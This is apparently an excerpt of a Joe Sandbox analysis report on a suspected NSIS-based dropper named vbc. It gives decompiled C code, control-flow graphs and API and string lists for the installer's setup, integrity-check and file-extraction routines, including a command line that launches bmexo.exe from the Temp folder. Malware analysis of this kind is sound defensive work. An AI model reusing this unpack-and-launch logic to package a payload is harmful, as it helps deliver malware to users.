                                          • Associated: 00000004.00000002.988249278.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988285968.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988299511.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988316158.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988346737.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988352904.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988357871.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                          Similarity
                                          • API ID: Window$Item$MessageSendShow$EnableLong$Menu$ClassDestroyEnabledSystemTextlstrlen
                                          • String ID:
                                          • API String ID: 1860320154-0
                                          • Opcode ID: c3199f5d2ce6d65744aaa9316b253cb325a561f7dca841ae501f2507a703712f
                                          • Instruction ID: f65a6081c11fa3fb00f54a078e57315272211b1d7c342d1bec1514082707246b
                                          • Opcode Fuzzy Hash: c3199f5d2ce6d65744aaa9316b253cb325a561f7dca841ae501f2507a703712f
                                          • Instruction Fuzzy Hash: 63C1ADB1500204BFDB216F65EE49E2A3AA8EBC6745F00853EF741B55E0CB3D5851DB2E
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00403D1D Relevance: 44.0, APIs: 13, Strings: 12, Instructions: 215stringregistryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 248 403d1d-403d35 call 406a3b 251 403d37-403d47 call 4065b5 248->251 252 403d49-403d80 call 40653c 248->252 261 403da3-403dcc call 403ff3 call 406045 251->261 257 403d82-403d93 call 40653c 252->257 258 403d98-403d9e lstrcatW 252->258 257->258 258->261 266 403dd2-403dd7 261->266 267 403e5e-403e66 call 406045 261->267 266->267 268 403ddd-403e05 call 40653c 266->268 273 403e74-403e99 LoadImageW 267->273 274 403e68-403e6f call 4066ab 267->274 268->267 275 403e07-403e0b 268->275 277 403f1a-403f22 call 40140b 273->277 278 403e9b-403ecb RegisterClassW 273->278 274->273 279 403e1d-403e29 lstrlenW 275->279 280 403e0d-403e1a call 405f6a 275->280 292 403f24-403f27 277->292 293 403f2c-403f37 call 403ff3 277->293 281 403ed1-403f15 SystemParametersInfoW CreateWindowExW 278->281 282 403fe9 278->282 286 403e51-403e59 call 405f3d call 40666e 279->286 287 403e2b-403e39 lstrcmpiW 279->287 280->279 281->277 285 403feb-403ff2 282->285 286->267 287->286 291 403e3b-403e45 GetFileAttributesW 287->291 296 403e47-403e49 291->296 297 403e4b-403e4c call 405f89 291->297 292->285 301 403fc0-403fc8 call 4057a3 293->301 302 403f3d-403f57 ShowWindow call 4069cb 293->302 296->286 296->297 297->286 307 403fe2-403fe4 call 40140b 301->307 308 403fca-403fd0 301->308 309 403f63-403f75 GetClassInfoW 302->309 310 403f59-403f5e call 4069cb 302->310 307->282 308->292 311 403fd6-403fdd call 40140b 308->311 314 403f77-403f87 GetClassInfoW RegisterClassW 309->314 315 403f8d-403fb0 DialogBoxParamW call 40140b 309->315 310->309 311->292 314->315 319 403fb5-403fbe call 403c6d 315->319 319->285
                                          C-Code - Quality: 96%
                                          			E00403D1D(void* __eflags) {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				void _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t22;
				void* _t30;
				void* _t32;
				int _t33;
				void* _t36;
				int _t39;
				int _t40;
				int _t44;
				short _t63;
				WCHAR* _t65;
				signed char _t69;
				WCHAR* _t76;
				intOrPtr _t82;
				WCHAR* _t87;

				_t82 =  *0x7a8ab0;
				_t22 = E00406A3B(2);
				_t90 = _t22;
				if(_t22 == 0) {
					_t76 = 0x7a1f88;
					L"1033" = 0x30;
					 *0x7b5002 = 0x78;
					 *0x7b5004 = 0;
					E0040653C(_t78, __eflags, 0x80000001, L"Control Panel\\Desktop\\ResourceLocale", 0, 0x7a1f88, 0);
					__eflags =  *0x7a1f88;
					if(__eflags == 0) {
						E0040653C(_t78, __eflags, 0x80000003, L".DEFAULT\\Control Panel\\International",  &M004083D4, 0x7a1f88, 0);
					}
					lstrcatW(L"1033", _t76);
				} else {
					E004065B5(L"1033",  *_t22() & 0x0000ffff);
				}
				E00403FF3(_t78, _t90);
				 *0x7a8b20 =  *0x7a8ab8 & 0x00000020;
				 *0x7a8b3c = 0x10000;
				if(E00406045(_t90, 0x7b3800) != 0) {
					L16:
					if(E00406045(_t98, 0x7b3800) == 0) {
						E004066AB(_t76, 0, _t82, 0x7b3800,  *((intOrPtr*)(_t82 + 0x118)));
					}
					_t30 = LoadImageW( *0x7a8aa0, 0x67, 1, 0, 0, 0x8040);
					 *0x7a7a88 = _t30;
					if( *((intOrPtr*)(_t82 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t32 = E00403FF3(_t78, __eflags);
							__eflags =  *0x7a8b40;
							if( *0x7a8b40 != 0) {
								_t33 = E004057A3(_t32, 0);
								__eflags = _t33;
								if(_t33 == 0) {
									E0040140B(1);
									goto L33;
								}
								__eflags =  *0x7a7a6c;
								if( *0x7a7a6c == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x7a1f68, 5); // executed
							_t39 = E004069CB("RichEd20"); // executed
							__eflags = _t39;
							if(_t39 == 0) {
								E004069CB("RichEd32");
							}
							_t87 = L"RichEdit20W";
							_t40 = GetClassInfoW(0, _t87, 0x7a7a40);
							__eflags = _t40;
							if(_t40 == 0) {
								GetClassInfoW(0, L"RichEdit", 0x7a7a40);
								 *0x7a7a64 = _t87;
								RegisterClassW(0x7a7a40);
							}
							_t44 = DialogBoxParamW( *0x7a8aa0,  *0x7a7a80 + 0x00000069 & 0x0000ffff, 0, E004040CB, 0); // executed
							E00403C6D(E0040140B(5), 1);
							return _t44;
						}
						L22:
						_t36 = 2;
						return _t36;
					} else {
						_t78 =  *0x7a8aa0;
						 *0x7a7a44 = E00401000;
						 *0x7a7a50 =  *0x7a8aa0;
						 *0x7a7a54 = _t30;
						 *0x7a7a64 = 0x40a3b4;
						if(RegisterClassW(0x7a7a40) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						SystemParametersInfoW(0x30, 0,  &_v16, 0);
						 *0x7a1f68 = CreateWindowExW(0x80, 0x40a3b4, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x7a8aa0, 0);
						goto L21;
					}
				} else {
					_t78 =  *(_t82 + 0x48);
					_t92 = _t78;
					if(_t78 == 0) {
						goto L16;
					}
					_t76 = 0x7a6a40;
					E0040653C(_t78, _t92,  *((intOrPtr*)(_t82 + 0x44)),  *0x7a8ad8 + _t78 * 2,  *0x7a8ad8 +  *(_t82 + 0x4c) * 2, 0x7a6a40, 0);
					_t63 =  *0x7a6a40; // 0x43
					if(_t63 == 0) {
						goto L16;
					}
					if(_t63 == 0x22) {
						_t76 = 0x7a6a42;
						 *((short*)(E00405F6A(0x7a6a42, 0x22))) = 0;
					}
					_t65 = _t76 + lstrlenW(_t76) * 2 - 8;
					if(_t65 <= _t76 || lstrcmpiW(_t65, L".exe") != 0) {
						L15:
						E0040666E(0x7b3800, E00405F3D(_t76));
						goto L16;
					} else {
						_t69 = GetFileAttributesW(_t76);
						if(_t69 == 0xffffffff) {
							L14:
							E00405F89(_t76);
							goto L15;
						}
						_t98 = _t69 & 0x00000010;
						if((_t69 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}
























                                          0x00403d23
                                          0x00403d2c
                                          0x00403d33
                                          0x00403d35
                                          0x00403d49
                                          0x00403d5b
                                          0x00403d64
                                          0x00403d6d
                                          0x00403d74
                                          0x00403d79
                                          0x00403d80
                                          0x00403d93
                                          0x00403d93
                                          0x00403d9e
                                          0x00403d37
                                          0x00403d42
                                          0x00403d42
                                          0x00403da3
                                          0x00403db6
                                          0x00403dbb
                                          0x00403dcc
                                          0x00403e5e
                                          0x00403e66
                                          0x00403e6f
                                          0x00403e6f
                                          0x00403e85
                                          0x00403e8b
                                          0x00403e99
                                          0x00403f1a
                                          0x00403f22
                                          0x00403f2c
                                          0x00403f31
                                          0x00403f37
                                          0x00403fc1
                                          0x00403fc6
                                          0x00403fc8
                                          0x00403fe4
                                          0x00000000
                                          0x00403fe4
                                          0x00403fca
                                          0x00403fd0
                                          0x00403fd8
                                          0x00403fd8
                                          0x00000000
                                          0x00403fd0
                                          0x00403f45
                                          0x00403f50
                                          0x00403f55
                                          0x00403f57
                                          0x00403f5e
                                          0x00403f5e
                                          0x00403f69
                                          0x00403f71
                                          0x00403f73
                                          0x00403f75
                                          0x00403f7e
                                          0x00403f81
                                          0x00403f87
                                          0x00403f87
                                          0x00403fa6
                                          0x00403fb7
                                          0x00000000
                                          0x00403fbc
                                          0x00403f24
                                          0x00403f26
                                          0x00000000
                                          0x00403e9b
                                          0x00403e9b
                                          0x00403ea7
                                          0x00403eb1
                                          0x00403eb7
                                          0x00403ebc
                                          0x00403ecb
                                          0x00403fe9
                                          0x00403fe9
                                          0x00000000
                                          0x00403fe9
                                          0x00403eda
                                          0x00403f15
                                          0x00000000
                                          0x00403f15
                                          0x00403dd2
                                          0x00403dd2
                                          0x00403dd5
                                          0x00403dd7
                                          0x00000000
                                          0x00000000
                                          0x00403de5
                                          0x00403df7
                                          0x00403dfc
                                          0x00403e05
                                          0x00000000
                                          0x00000000
                                          0x00403e0b
                                          0x00403e0d
                                          0x00403e1a
                                          0x00403e1a
                                          0x00403e23
                                          0x00403e29
                                          0x00403e51
                                          0x00403e59
                                          0x00000000
                                          0x00403e3b
                                          0x00403e3c
                                          0x00403e45
                                          0x00403e4b
                                          0x00403e4c
                                          0x00000000
                                          0x00403e4c
                                          0x00403e47
                                          0x00403e49
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00403e49
                                          0x00403e29

                                          APIs
                                            • Part of subcall function 00406A3B: GetModuleHandleA.KERNEL32(?,00000020,?,00403756,0000000B), ref: 00406A4D
                                            • Part of subcall function 00406A3B: GetProcAddress.KERNEL32(00000000,?), ref: 00406A68
                                          • lstrcatW.KERNEL32 ref: 00403D9E
                                          • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\bmexo.exe C:\Users\user\AppData\Local\Temp\fmrfya,?,?,?,C:\Users\user\AppData\Local\Temp\bmexo.exe C:\Users\user\AppData\Local\Temp\fmrfya,00000000,007B3800,1033,007A1F88,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F88,00000000,00000002,7556D4C4), ref: 00403E1E
                                          • lstrcmpiW.KERNEL32(?,.exe,C:\Users\user\AppData\Local\Temp\bmexo.exe C:\Users\user\AppData\Local\Temp\fmrfya,?,?,?,C:\Users\user\AppData\Local\Temp\bmexo.exe C:\Users\user\AppData\Local\Temp\fmrfya,00000000,007B3800,1033,007A1F88,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F88,00000000), ref: 00403E31
                                          • GetFileAttributesW.KERNEL32(C:\Users\user\AppData\Local\Temp\bmexo.exe C:\Users\user\AppData\Local\Temp\fmrfya,?,00000000,?), ref: 00403E3C
                                          • LoadImageW.USER32 ref: 00403E85
                                            • Part of subcall function 004065B5: wsprintfW.USER32 ref: 004065C2
                                          • RegisterClassW.USER32 ref: 00403EC2
                                          • SystemParametersInfoW.USER32 ref: 00403EDA
                                          • CreateWindowExW.USER32 ref: 00403F0F
                                          • ShowWindow.USER32(00000005,00000000), ref: 00403F45
                                          • GetClassInfoW.USER32 ref: 00403F71
                                          • GetClassInfoW.USER32 ref: 00403F7E
                                          • RegisterClassW.USER32 ref: 00403F87
                                          • DialogBoxParamW.USER32 ref: 00403FA6
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.987799312.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.987790728.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.987830833.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.987844954.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.987854603.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988249278.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988285968.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988299511.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988316158.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988346737.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988352904.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988357871.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                          Similarity
                                          • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                          • String ID: .DEFAULT\Control Panel\International$.exe$1033$@zz$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\bmexo.exe C:\Users\user\AppData\Local\Temp\fmrfya$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                          • API String ID: 1975747703-622700630
                                          • Opcode ID: 13dc47a7a0bb2ebca6ba8b70f4dc1bd23eb177df04af224418cffa241dba538e
                                          • Instruction ID: b3798c48b8e7ed104fde3a001c8dc5b3ad58c50dca8dc7adab70101e5acdd628
                                          • Opcode Fuzzy Hash: 13dc47a7a0bb2ebca6ba8b70f4dc1bd23eb177df04af224418cffa241dba538e
                                          • Instruction Fuzzy Hash: 6561C170640200BED620AF669D46F2B3A6CEBC5B45F40853FF941B62E2DB7D8901CB6D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004030D0 Relevance: 21.2, APIs: 5, Strings: 7, Instructions: 202memoryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 322 4030d0-40311e GetTickCount GetModuleFileNameW call 40615e 325 403120-403125 322->325 326 40312a-403158 call 40666e call 405f89 call 40666e GetFileSize 322->326 327 403370-403374 325->327 334 403246-403254 call 40302e 326->334 335 40315e-403175 326->335 341 403328-40332d 334->341 342 40325a-40325d 334->342 337 403177 335->337 338 403179-403186 call 4035e8 335->338 337->338 346 4032e4-4032ec call 40302e 338->346 347 40318c-403192 338->347 341->327 344 403289-4032d8 GlobalAlloc call 40618d CreateFileW 342->344 345 40325f-403277 call 4035fe call 4035e8 342->345 361 4032da-4032df 344->361 362 4032ee-40331e call 4035fe call 403377 344->362 345->341 374 40327d-403283 345->374 346->341 351 403212-403216 347->351 352 403194-4031ac call 406119 347->352 357 403218-40321e call 40302e 351->357 358 40321f-403225 351->358 352->358 367 4031ae-4031b5 352->367 357->358 359 403227-403235 call 406b28 358->359 360 403238-403240 358->360 359->360 360->334 360->335 361->327 378 403323-403326 362->378 367->358 372 4031b7-4031be 367->372 372->358 375 4031c0-4031c7 372->375 374->341 374->344 375->358 377 4031c9-4031d0 375->377 377->358 379 4031d2-4031f2 377->379 378->341 380 40332f-403340 378->380 379->341 381 4031f8-4031fc 379->381 382 403342 380->382 383 403348-40334d 380->383 384 403204-40320c 381->384 385 4031fe-403202 381->385 382->383 386 40334e-403354 383->386 384->358 387 40320e-403210 384->387 385->334 385->384 386->386 388 403356-40336e call 406119 386->388 387->358 388->327
                                          C-Code - Quality: 97%
                                          			E004030D0(void* __eflags, signed int _a4) {
				long _v8;
				long _v12;
				intOrPtr _v16;
				long _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				signed int _v40;
				short _v560;
				long _t54;
				void* _t57;
				void* _t61;
				intOrPtr _t64;
				void* _t67;
				intOrPtr* _t69;
				long _t81;
				signed int _t88;
				intOrPtr _t91;
				void* _t94;
				void* _t99;
				void* _t103;
				long _t104;
				long _t107;
				void* _t108;

				_v8 = 0;
				_v12 = 0;
				 *0x7a8aac = GetTickCount() + 0x3e8;
				GetModuleFileNameW(0, 0x7b6800, 0x400);
				_t103 = E0040615E(0x7b6800, 0x80000000, 3);
				 *0x40a018 = _t103;
				if(_t103 == 0xffffffff) {
					return L"Error launching installer";
				}
				E0040666E(0x7b4800, 0x7b6800);
				E0040666E(0x7b7000, E00405F89(0x7b4800));
				_t54 = GetFileSize(_t103, 0);
				 *0x79f740 = _t54;
				_t107 = _t54;
				if(_t54 <= 0) {
					L22:
					E0040302E(1);
					_pop(_t94);
					if( *0x7a8ab4 == 0) {
						goto L30;
					}
					if(_v12 == 0) {
						L26:
						_t57 = GlobalAlloc(0x40, _v20); // executed
						_t108 = _t57;
						 *0x40ce78 = 0xb;
						 *0x40ce90 = 0; // executed
						E0040618D(_t94,  &_v560, L"C:\\Users\\Albus\\AppData\\Local\\Temp\\"); // executed
						_t61 = CreateFileW( &_v560, 0xc0000000, 0, 0, 2, 0x4000100, 0); // executed
						 *0x40a01c = _t61;
						if(_t61 != 0xffffffff) {
							_t64 = E004035FE( *0x7a8ab4 + 0x1c);
							 *0x79f744 = _t64;
							 *0x79f738 = _t64 - ( !_v40 & 0x00000004) + _v16 - 0x1c; // executed
							_t67 = E00403377(_v16, 0xffffffff, 0, _t108, _v20); // executed
							if(_t67 == _v20) {
								 *0x7a8ab0 = _t108;
								 *0x7a8ab8 =  *_t108;
								if((_v40 & 0x00000001) != 0) {
									 *0x7a8abc =  *0x7a8abc + 1;
								}
								_t45 = _t108 + 0x44; // 0x44
								_t69 = _t45;
								_t99 = 8;
								do {
									_t69 = _t69 - 8;
									 *_t69 =  *_t69 + _t108;
									_t99 = _t99 - 1;
								} while (_t99 != 0);
								 *((intOrPtr*)(_t108 + 0x3c)) =  *0x79f734;
								E00406119(0x7a8ac0, _t108 + 4, 0x40);
								return 0;
							}
							goto L30;
						}
						return L"Error writing temporary file. Make sure your temp folder is valid.";
					}
					E004035FE( *0x79f730);
					if(E004035E8( &_a4, 4) == 0 || _v8 != _a4) {
						goto L30;
					} else {
						goto L26;
					}
				} else {
					do {
						_t104 = _t107;
						asm("sbb eax, eax");
						_t81 = ( ~( *0x7a8ab4) & 0x00007e00) + 0x200;
						if(_t107 >= _t81) {
							_t104 = _t81;
						}
						if(E004035E8(0x797730, _t104) == 0) {
							E0040302E(1);
							L30:
							return L"Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						if( *0x7a8ab4 != 0) {
							if((_a4 & 0x00000002) == 0) {
								E0040302E(0);
							}
							goto L19;
						}
						E00406119( &_v40, 0x797730, 0x1c);
						_t88 = _v40;
						if((_t88 & 0xfffffff0) == 0 && _v36 == 0xdeadbeef && _v24 == 0x74736e49 && _v28 == 0x74666f73 && _v32 == 0x6c6c754e) {
							_a4 = _a4 | _t88;
							 *0x7a8b40 =  *0x7a8b40 | _a4 & 0x00000002;
							_t91 = _v16;
							 *0x7a8ab4 =  *0x79f730;
							if(_t91 > _t107) {
								goto L30;
							}
							if((_a4 & 0x00000008) != 0 || (_a4 & 0x00000004) == 0) {
								_v12 = _v12 + 1;
								_t107 = _t91 - 4;
								if(_t104 > _t107) {
									_t104 = _t107;
								}
								goto L19;
							} else {
								goto L22;
							}
						}
						L19:
						if(_t107 <  *0x79f740) {
							_v8 = E00406B28(_v8, 0x797730, _t104);
						}
						 *0x79f730 =  *0x79f730 + _t104;
						_t107 = _t107 - _t104;
					} while (_t107 != 0);
					goto L22;
				}
			}




























                                          0x004030de
                                          0x004030e1
                                          0x004030fb
                                          0x00403100
                                          0x00403113
                                          0x00403118
                                          0x0040311e
                                          0x00000000
                                          0x00403120
                                          0x00403131
                                          0x00403142
                                          0x00403149
                                          0x00403151
                                          0x00403156
                                          0x00403158
                                          0x00403246
                                          0x00403248
                                          0x00403253
                                          0x00403254
                                          0x00000000
                                          0x00000000
                                          0x0040325d
                                          0x00403289
                                          0x0040328e
                                          0x00403294
                                          0x004032a2
                                          0x004032a9
                                          0x004032af
                                          0x004032ca
                                          0x004032d3
                                          0x004032d8
                                          0x004032f7
                                          0x00403307
                                          0x00403319
                                          0x0040331e
                                          0x00403326
                                          0x00403333
                                          0x0040333b
                                          0x00403340
                                          0x00403342
                                          0x00403342
                                          0x0040334a
                                          0x0040334a
                                          0x0040334d
                                          0x0040334e
                                          0x0040334e
                                          0x00403351
                                          0x00403353
                                          0x00403353
                                          0x0040335d
                                          0x00403369
                                          0x00000000
                                          0x0040336e
                                          0x00000000
                                          0x00403326
                                          0x00000000
                                          0x004032da
                                          0x00403265
                                          0x00403277
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0040315e
                                          0x0040315e
                                          0x00403163
                                          0x00403167
                                          0x0040316e
                                          0x00403175
                                          0x00403177
                                          0x00403177
                                          0x00403186
                                          0x004032e6
                                          0x00403328
                                          0x00000000
                                          0x00403328
                                          0x00403192
                                          0x00403216
                                          0x00403219
                                          0x0040321e
                                          0x00000000
                                          0x00403216
                                          0x0040319f
                                          0x004031a4
                                          0x004031ac
                                          0x004031d2
                                          0x004031e1
                                          0x004031e7
                                          0x004031ec
                                          0x004031f2
                                          0x00000000
                                          0x00000000
                                          0x004031fc
                                          0x00403204
                                          0x00403207
                                          0x0040320c
                                          0x0040320e
                                          0x0040320e
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x004031fc
                                          0x0040321f
                                          0x00403225
                                          0x00403235
                                          0x00403235
                                          0x00403238
                                          0x0040323e
                                          0x0040323e
                                          0x00000000
                                          0x0040315e

                                          APIs
                                          • GetTickCount.KERNEL32(7556D4C4,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004030E4
                                          • GetModuleFileNameW.KERNEL32(00000000,007B6800,00000400), ref: 00403100
                                            • Part of subcall function 0040615E: GetFileAttributesW.KERNELBASE(00000003,00403113,007B6800,80000000,00000003), ref: 00406162
                                            • Part of subcall function 0040615E: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406184
                                          • GetFileSize.KERNEL32(00000000,00000000,007B7000,00000000,007B4800,007B4800,007B6800,007B6800,80000000,00000003), ref: 00403149
                                          • GlobalAlloc.KERNELBASE(00000040,?), ref: 0040328E
                                          Strings
                                          • Null, xrefs: 004031C9
                                          • Error launching installer, xrefs: 00403120
                                          • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403328
                                          • Inst, xrefs: 004031B7
                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 004030DA, 0040329C
                                          • Error writing temporary file. Make sure your temp folder is valid., xrefs: 004032DA
                                          • soft, xrefs: 004031C0
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.987799312.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.987790728.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.987830833.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.987844954.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.987854603.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988249278.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988285968.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988299511.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988316158.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988346737.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988352904.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988357871.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                          Similarity
                                          • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                          • String ID: C:\Users\user\AppData\Local\Temp\$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                          • API String ID: 2803837635-2435864027
                                          • Opcode ID: 323c9084f4495cb75f4cf70951988b51dd1d9d869199bcaf0981bfe9882d4e48
                                          • Instruction ID: 583a998f33a1e047253031f1d22d0aa602d55a867c39f8e0fceec447792fd132
                                          • Opcode Fuzzy Hash: 323c9084f4495cb75f4cf70951988b51dd1d9d869199bcaf0981bfe9882d4e48
                                          • Instruction Fuzzy Hash: 0671E171940204ABCB20DFA5EE85A9E3FA8AB11316F10817FF900B62D1DB7C9E418B5D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040176F Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 145stringtimeCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 455 40176f-401794 call 402da6 call 405fb4 460 401796-40179c call 40666e 455->460 461 40179e-4017b0 call 40666e call 405f3d lstrcatW 455->461 467 4017b5-4017b6 call 4068f5 460->467 461->467 470 4017bb-4017bf 467->470 471 4017c1-4017cb call 4069a4 470->471 472 4017f2-4017f5 470->472 479 4017dd-4017ef 471->479 480 4017cd-4017db CompareFileTime 471->480 474 4017f7-4017f8 call 406139 472->474 475 4017fd-401819 call 40615e 472->475 474->475 482 40181b-40181e 475->482 483 40188d-4018b6 call 4056d0 call 403377 475->483 479->472 480->479 484 401820-40185e call 40666e * 2 call 4066ab call 40666e call 405cce 482->484 485 40186f-401879 call 4056d0 482->485 497 4018b8-4018bc 483->497 498 4018be-4018ca SetFileTime 483->498 484->470 518 401864-401865 484->518 495 401882-401888 485->495 499 402c33 495->499 497->498 501 4018d0-4018db CloseHandle 497->501 498->501 503 402c35-402c39 499->503 504 4018e1-4018e4 501->504 505 402c2a-402c2d 501->505 507 4018e6-4018f7 call 4066ab lstrcatW 504->507 508 4018f9-4018fc call 4066ab 504->508 505->499 512 401901-4023a2 call 405cce 507->512 508->512 512->503 512->505 518->495 520 401867-401868 518->520 520->485
                                          C-Code - Quality: 77%
                                          			E0040176F(FILETIME* __ebx, void* __eflags) {
				void* __esi;
				void* _t35;
				void* _t43;
				void* _t45;
				FILETIME* _t51;
				FILETIME* _t64;
				void* _t66;
				signed int _t72;
				FILETIME* _t73;
				FILETIME* _t77;
				signed int _t79;
				WCHAR* _t81;
				void* _t83;
				void* _t84;
				void* _t86;

				_t77 = __ebx;
				 *(_t86 - 8) = E00402DA6(0x31);
				 *(_t86 + 8) =  *(_t86 - 0x30) & 0x00000007;
				_t35 = E00405FB4( *(_t86 - 8));
				_push( *(_t86 - 8));
				_t81 = L"C:\\U";
				if(_t35 == 0) {
					lstrcatW(E00405F3D(E0040666E(_t81, 0x7b4000)), ??);
				} else {
					E0040666E();
				}
				E004068F5(_t81);
				while(1) {
					__eflags =  *(_t86 + 8) - 3;
					if( *(_t86 + 8) >= 3) {
						_t66 = E004069A4(_t81);
						_t79 = 0;
						__eflags = _t66 - _t77;
						if(_t66 != _t77) {
							_t73 = _t66 + 0x14;
							__eflags = _t73;
							_t79 = CompareFileTime(_t73, _t86 - 0x24);
						}
						asm("sbb eax, eax");
						_t72 =  ~(( *(_t86 + 8) + 0xfffffffd | 0x80000000) & _t79) + 1;
						__eflags = _t72;
						 *(_t86 + 8) = _t72;
					}
					__eflags =  *(_t86 + 8) - _t77;
					if( *(_t86 + 8) == _t77) {
						E00406139(_t81);
					}
					__eflags =  *(_t86 + 8) - 1;
					_t43 = E0040615E(_t81, 0x40000000, (0 |  *(_t86 + 8) != 0x00000001) + 1);
					__eflags = _t43 - 0xffffffff;
					 *(_t86 - 0x38) = _t43;
					if(_t43 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t86 + 8) - _t77;
					if( *(_t86 + 8) != _t77) {
						E004056D0(0xffffffe2,  *(_t86 - 8));
						__eflags =  *(_t86 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t86 - 4)) = 1;
						}
						L31:
						 *0x7a8b28 =  *0x7a8b28 +  *((intOrPtr*)(_t86 - 4));
						__eflags =  *0x7a8b28;
						goto L32;
					} else {
						E0040666E(0x40b5f8, _t83);
						E0040666E(_t83, _t81);
						E004066AB(_t77, _t81, _t83, "C:\Users\Albus\AppData\Local\Temp",  *((intOrPtr*)(_t86 - 0x1c)));
						E0040666E(_t83, 0x40b5f8);
						_t64 = E00405CCE("C:\Users\Albus\AppData\Local\Temp",  *(_t86 - 0x30) >> 3) - 4;
						__eflags = _t64;
						if(_t64 == 0) {
							continue;
						} else {
							__eflags = _t64 == 1;
							if(_t64 == 1) {
